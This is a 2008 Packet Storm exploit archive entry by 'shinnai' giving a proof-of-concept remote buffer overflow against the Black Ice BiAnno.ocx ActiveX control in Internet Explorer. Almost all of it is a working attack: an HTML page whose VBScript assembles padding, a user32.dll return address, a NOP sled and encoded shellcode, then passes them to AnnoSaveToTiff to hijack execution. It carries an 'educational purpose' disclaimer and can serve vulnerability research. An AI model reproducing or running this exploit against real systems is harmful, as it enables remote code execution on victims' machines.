blackicebianno2-overflow.txt

2008-06-11T00:00:00
ID PACKETSTORM:67155
Type packetstorm
Reporter shinnai
Modified 2008-06-11T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------------  
Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow (2)  
url: http://www.blackice.com  
  
File : BiAnno.ocx  
Ver. : 10.9.5.0  
CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A}  
  
Mark.: RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: False  
  
Author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://shinnai.altervista.org  
  
This was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7  
  
In memory of rgod  
------------------------------------------------------------------------------  
<object classid='clsid:B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A' id='test'></object>  
  
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>  
  
<script language='vbscript'>  
Sub tryMe  
buff = String(524, "A")  
  
get_EIP = unescape("%EB%BA%3F%7E") 'call ESP from user32.dll  
  
nop = String(9, unescape("%90"))  
  
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _  
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _  
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _  
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _  
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _  
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _  
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _  
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _  
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _  
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _  
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _  
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _  
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _  
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _  
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _  
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _  
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _  
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _  
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _  
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _  
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _  
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")  
  
egg = buff + get_EIP + get_EIP + nop + shellcode + nop  
  
'As you can see, I use get_EIP two times. That's because the first one is useful  
'to call our shellcode, the second one is just to bypass an exception.  
  
test.AnnoSaveToTiff egg, 1  
End Sub  
</script>  
  
`